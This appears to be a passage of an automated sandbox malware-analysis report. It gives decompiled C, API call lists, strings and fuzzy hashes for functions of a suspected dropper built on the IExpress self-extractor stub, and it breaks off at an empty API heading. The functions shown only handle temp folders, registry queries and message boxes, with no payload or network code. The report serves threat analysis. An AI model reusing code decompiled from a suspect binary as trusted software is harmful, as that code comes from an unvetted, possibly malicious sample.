GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 003856B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0038571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00385737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003857CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003857EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00385802

Part of subcall function 00382630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00382654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00385830

Part of subcall function 00386517: FindResourceA.KERNEL32(00380000,000007D6,00000005), ref: 0038652A
Part of subcall function 00386517: LoadResource.KERNEL32(00380000,00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00386538
Part of subcall function 00386517: DialogBoxIndirectParamA.USER32(00380000,00000000,00000547,003819E0,00000000), ref: 00386557
Part of subcall function 00386517: FreeResource.KERNEL32(00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00386560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00385878

Part of subcall function 0038597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003859A8
Part of subcall function 0038597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003859AF

Strings

RUNPROGRAM, xrefs: 003855BD, 00385600
A:\, xrefs: 003856F4
<None>, xrefs: 00385632
msdownld.tmp, xrefs: 003857D3
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 003856AE, 003856B3, 0038583D
Z, xrefs: 0038570A

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-559629209
Opcode ID: f6671a2aba6d27c60d087dbfee8ba140c67baf03da7c5ca3cbe5369cb85d98e4
Instruction ID: 8a17121d12eb5c87ac972dd8322183ca32be21d6856c26ce3f5b6953179407dd
Opcode Fuzzy Hash: f6671a2aba6d27c60d087dbfee8ba140c67baf03da7c5ca3cbe5369cb85d98e4
Instruction Fuzzy Hash: 558129B0B04B059BEB23BB718C85BFE72AD9B60300F5400E6F586D6191EFB48DC68B50

Uniqueness

Uniqueness Score: -1.00%

Function 003844B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E003844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x388004; // 0xb25159a8
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x388a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x389a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00381680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0038171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0038171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0038681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E003867C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lega", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0038681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E003867C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lega", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00386CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x003844b9
0x003844c4
0x003844cb
0x003844d8
0x003844e4
0x003844eb
0x003844ee
0x003844ef
0x003844ef
0x003844f1
0x003844f7
0x003844f8
0x0038467b
0x003844fe
0x00384509
0x00384518
0x00384525
0x00384562
0x00384568
0x00384568
0x0038456b
0x0038456b
0x0038456d
0x0038456e
0x00384572
0x00384578
0x0038457c
0x003845cb
0x00384607
0x00384607
0x0038460d
0x00384613
0x00384617
0x00000000
0x0038461d
0x00384623
0x00384626
0x00384628
0x00000000
0x00384628
0x003845cd
0x003845cd
0x003845cf
0x003845cf
0x003845d2
0x003845d2
0x003845d4
0x003845d5
0x003845db
0x003845de
0x003845e3
0x003845e9
0x003845ed
0x00000000
0x003845f3
0x003845fd
0x00000000
0x00384602
0x003845ed
0x0038457e
0x0038457e
0x00384580
0x00384580
0x00384583
0x00384583
0x00384585
0x00384586
0x0038458a
0x0038458c
0x0038458f
0x0038458f
0x00384591
0x00384592
0x0038459b
0x0038459e
0x003845a3
0x003845a9
0x003845ad
0x00000000
0x003845af
0x003845af
0x003845bf
0x0038462d
0x00384630
0x0038463d
0x0038464e
0x0038464e
0x0038463f
0x00384640
0x00384647
0x0038464c
0x00000000
0x00000000
0x0038464c
0x00384666
0x0038466d
0x0038466f
0x00384675
0x00384675
0x003845ad
0x00384527
0x0038452e
0x0038453f
0x0038453f
0x00384530
0x00384531
0x00384538
0x0038453d
0x00000000
0x00000000
0x0038453d
0x00384554
0x0038455a
0x0038455a
0x0038455a
0x00384525
0x0038468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
LocalAlloc.KERNEL32(00000040,00000065), ref: 003845A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 003845E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0038460D
MessageBeep.USER32(00000000), ref: 00384630
MessageBoxA.USER32(?,00000000,lega,00000000), ref: 00384666
LocalFree.KERNEL32(00000000), ref: 0038466F

Part of subcall function 0038681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0038686E
Part of subcall function 0038681F: GetSystemMetrics.USER32(0000004A), ref: 003868A7
Part of subcall function 0038681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003868CC
Part of subcall function 0038681F: RegQueryValueExA.ADVAPI32(?,00381140,00000000,?,?,0000000C), ref: 003868F4
Part of subcall function 0038681F: RegCloseKey.ADVAPI32(?), ref: 00386902

Strings

lega, xrefs: 00384545, 0038465A
LoadString() Error. Could not load string resource., xrefs: 003844E4

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$lega
API String ID: 3244514340-2134167237
Opcode ID: 8b15f1728f65de412f137dc52429449e99b712129b54d21c39cacc597c51f590
Instruction ID: 0ca4c375208ba1d058c40e1af25ac8beddc0ca79534d5492d5c51d0867804a5a
Opcode Fuzzy Hash: 8b15f1728f65de412f137dc52429449e99b712129b54d21c39cacc597c51f590
Instruction Fuzzy Hash: E751D07290031AABDB23AF28CC48BAA7B69EF46300F1541D5FD09A7641DB759E05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003853A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E003853A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x388004; // 0xb25159a8
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0038171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00381680(_t32, 0x104, _t20);
					E0038658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00386CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x388a20 = 1;
				goto L5;
			}

0x003853ac
0x003853b3
0x003853b9
0x003853bb
0x003853bd
0x003853bf
0x003853d1
0x003853d6
0x003853e0
0x003853e2
0x003853f5
0x003853fb
0x00385402
0x0038540b
0x00000000
0x00000000
0x00385413
0x00000000
0x00000000
0x00385415
0x00385416
0x00385427
0x0038542a
0x0038542b
0x00385434
0x00385434
0x0038543a
0x0038544c
0x0038544c
0x00385452
0x0038545a
0x00000000
0x00000000
0x0038545e
0x0038545f
0x00000000

APIs

Part of subcall function 0038171E: _vsnprintf.MSVCRT ref: 00381750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003853FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385452

Strings

IXP%03d.TMP, xrefs: 003853C0
IXP, xrefs: 00385419
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 003853B7, 003853E1, 0038541E

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2659685179
Opcode ID: 23e5d8543ab5da734e8a5aed5bec92987df16e8ed2645e05e795f2a1103643c5
Instruction ID: f7a4c9123e7a9b6b209e801ed5346611e10d226358083e2bcf16d8a010618f81
Opcode Fuzzy Hash: 23e5d8543ab5da734e8a5aed5bec92987df16e8ed2645e05e795f2a1103643c5
Instruction Fuzzy Hash: 7E1104B1300B0467E322BB369C49FEF366DEBC1311F0000E6F646D7190CEB4894287A2

Uniqueness

Uniqueness Score: -1.00%

Function 0038256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0038256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E003824E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00382572
0x00382573
0x00382575
0x00382578
0x0038257d
0x00382627
0x00382583
0x00382586
0x00382589
0x003825eb
0x00382607
0x00000000
0x00382609
0x0038261a
0x00000000
0x0038261a
0x00000000
0x0038258b
0x0038258b
0x0038259e
0x003825b2
0x003825ba
0x003825cb
0x003825d1
0x003825d6
0x003825da
0x003825dd
0x003825dd
0x003825e3
0x003825e3
0x003825e3
0x0038258b
0x00382589
0x0038262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00384096,00384096,?,00381ED3,00000001,00000000,?,?,00384137,?), ref: 003825B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00384096,?,00381ED3,00000001,00000000,?,?,00384137,?,00384096), ref: 003825CB
RegCloseKey.KERNELBASE(?,?,00381ED3,00000001,00000000,?,?,00384137,?,00384096), ref: 003825DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00384096,00384096,?,00381ED3,00000001,00000000,?,?,00384137,?), ref: 003825FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00384096,00000000,00000000,00000000,00000000,?,00381ED3,00000001,00000000), ref: 0038261A

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 003825A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003825F5
PendingFileRenameOperations, xrefs: 003825C3

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: ba08c29d2dfcebda5ea744be897279bfc42a4122ced4a744d69f6c64c601edaf
Instruction ID: 22fcd7c85390a52eaecf9787f217000dec564b9c9fe60d2267c6525aea90b1a5
Opcode Fuzzy Hash: ba08c29d2dfcebda5ea744be897279bfc42a4122ced4a744d69f6c64c601edaf
Instruction Fuzzy Hash: 12114675942328FBAF22ABA19C09DFBBF7CDF457A1F5040D5F808A2011D6745E44E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00386A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00387155();
				_push(0x58);
				_push(0x3872b8);
				E00387208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x3888b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x3888b0; // 0x2
						if(__eflags != 0) {
							 *0x3881e4 = _t58;
							goto L13;
						} else {
							 *0x3888b0 = _t58;
							_t37 = E00386C3F(0x3810b8, 0x3810c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00386FF4();
						L13:
						_t68 =  *0x3888b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x3810b4);
							_push(0x3810ac);
							L00387202();
							 *0x3888b0 = 2;
						}
						if(_t53 == 0) {
							 *0x3888ac = 0;
						}
						_t71 =  *0x3888b4;
						if( *0x3888b4 != 0 && E00387060(_t71, 0x3888b4) != 0) {
							_t60 =  *0x3888b4; // 0x0
							 *0x38a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76665b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00382BFB(0x380000, 0, _t59); // executed
							 *0x3881e0 = _t30;
							__eflags =  *0x3881f8;
							if( *0x3881f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x3881e4;
							if( *0x3881e4 == 0) {
								__imp___cexit();
								_t30 =  *0x3881e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0038724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00386a60
0x00386a6a
0x00386a6c
0x00386a71
0x00386a78
0x00386a7f
0x00386a85
0x00386a8e
0x00386a91
0x00386a93
0x00386a9c
0x00386aa2
0x00000000
0x00000000
0x00386aa6
0x00386ab4
0x00000000
0x00386aa8
0x00386aaa
0x00386aab
0x00386aab
0x00386abf
0x00386abf
0x00386ac5
0x00386ad1
0x00386ad7
0x00386b05
0x00000000
0x00386ad9
0x00386ad9
0x00386ae9
0x00386af0
0x00386af2
0x00000000
0x00386af4
0x00386af4
0x00386afb
0x00386afb
0x00386af2
0x00386ac7
0x00386ac7
0x00386ac9
0x00386b0b
0x00386b0b
0x00386b11
0x00386b13
0x00386b18
0x00386b1d
0x00386b24
0x00386b24
0x00386b30
0x00386b39
0x00386b39
0x00386b3b
0x00386b42
0x00386b57
0x00386b5f
0x00386b65
0x00386b65
0x00386b67
0x00386b6c
0x00386b6e
0x00386b71
0x00386b74
0x00386b74
0x00386b79
0x00000000
0x00000000
0x00386b7d
0x00386b81
0x00000000
0x00000000
0x00386b83
0x00386b8c
0x00386b8d
0x00386b90
0x00386b90
0x00386b83
0x00386b81
0x00386b94
0x00386b98
0x00386ba2
0x00386b9a
0x00386b9a
0x00386b9a
0x00386ba3
0x00386bab
0x00386bb0
0x00386bb5
0x00386bbc
0x00386bbf
0x00000000
0x00386bbf
0x00386c1e
0x00386c25
0x00386c27
0x00386c2d
0x00386c2d
0x00386c32
0x00000000
0x00386bc5
0x00386bc5
0x00386bc8
0x00386bcc
0x00386bce
0x00386bce
0x00386bd1
0x00386bd3
0x00386bd3
0x00386bd6
0x00386bda
0x00386be1
0x00386be3
0x00386be5
0x00386be5
0x00386be6
0x00386be6
0x00386be9
0x00386bea
0x00386bea
0x00386b74
0x00386c39
0x00386c3e
0x00386c3e
0x00386abe
0x00386abe
0x00000000

APIs

Part of subcall function 00387155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00387182
Part of subcall function 00387155: GetCurrentProcessId.KERNEL32 ref: 00387191
Part of subcall function 00387155: GetCurrentThreadId.KERNEL32 ref: 0038719A
Part of subcall function 00387155: GetTickCount.KERNEL32 ref: 003871A3
Part of subcall function 00387155: QueryPerformanceCounter.KERNEL32(?), ref: 003871B8

GetStartupInfoW.KERNEL32(?,003872B8,00000058), ref: 00386A7F
Sleep.KERNEL32(000003E8), ref: 00386AB4
_amsg_exit.MSVCRT ref: 00386AC9
_initterm.MSVCRT ref: 00386B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00386B49
exit.KERNELBASE ref: 00386BBF
_ismbblead.MSVCRT ref: 00386BDA

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: cb71f207ca33e1750a83bf0f9865786e5947b84f235eb306e469e5bc1f6cb44e
Instruction ID: 3afd9a5e2e0c00ef6e350c35e3df857be23ea65e5d8b570cfea6977d5b916ee3
Opcode Fuzzy Hash: cb71f207ca33e1750a83bf0f9865786e5947b84f235eb306e469e5bc1f6cb44e
Instruction Fuzzy Hash: BA41F570944724CFDB23BB69DC4A7AA77E9EB84724F6500DAE851E7290CF7488418B81

Uniqueness

Uniqueness Score: -1.00%

Function 003858C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E003858C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00381680(_t20, _t36, _t33);
					E0038658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x389124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x389124 = E00386285();
					_t14 = 0;
				}
				return _t14;
			}

0x003858cd
0x003858d1
0x003858d3
0x003858d5
0x003858d8
0x003858d8
0x003858da
0x003858db
0x003858e1
0x003858ed
0x003858f1
0x0038591e
0x0038592c
0x00385943
0x0038594a
0x0038594d
0x00385953
0x00385959
0x00000000
0x0038595b
0x0038595c
0x00385963
0x0038596c
0x00000000
0x00385972
0x00385974
0x0038597a
0x0038597a
0x0038596c
0x003858f3
0x00385901
0x00385906
0x0038590b
0x00385910
0x00385910
0x00385918

APIs

